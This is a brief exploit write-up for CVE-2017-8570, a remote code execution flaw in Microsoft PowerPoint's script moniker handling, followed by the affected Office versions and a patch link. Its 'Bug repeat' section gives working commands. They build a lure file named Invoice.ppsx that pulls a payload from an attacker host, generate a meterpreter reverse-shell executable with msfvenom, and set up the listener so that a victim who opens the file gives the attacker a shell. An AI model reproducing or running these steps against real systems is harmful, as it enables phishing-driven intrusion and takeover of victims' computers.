In July 2017, Microsoft fixed multiple Microsoft Office vulnerabilities，including the cve-2017-8570 vulnerability which is a logical vulnerability，it is easy to use and simple,and the vulnerability is a remote code execution vulnerability for Microsoft Office.
The reason for this is that Microsoft PowerPoint will initialize the “script” Moniker object when it is executed, while the object will be activated during the presentation of the PowerPoint animation, and the SCT (script Component file) will be executed. An attack can trick a user into running a powerpoint file containing the vulnerability that results in obtaining the same executive permissions as the current logon user.
Microsoft Office 2007 Service Pack 3
Microsoft Office 2010 Service Pack 2 (32-bit editions)
Microsoft Office 2010 Service Pack 2 (64-bit editions)
Microsoft Office 2013 RT Service Pack 1
Microsoft Office 2013 Service Pack 1 (32-bit editions)
Microsoft Office 2013 Service Pack 1 (64-bit editions)
Microsoft Office 2016 (32-bit edition)
Microsoft Office 2016 (64-bit edition)
0x03 Bug repeat
python cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u http://attackerip/logo.doc
msfvenom -p windows/meterpreter/reverse_tcp LHOST=attackerip LPORT=4444 -f exe > /tmp/shell.exe
python cve-2017-8570_toolkit.py -M exp -e http://attackerip/shell.exe -l /tmp/shell.exe
set payload windows/meterpreter/reverse_tcp //设置Payload
set LHOST attackerip
Double click Invoice.ppsx in victim that you can get a meterpreter.
Get the patch from MS : https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570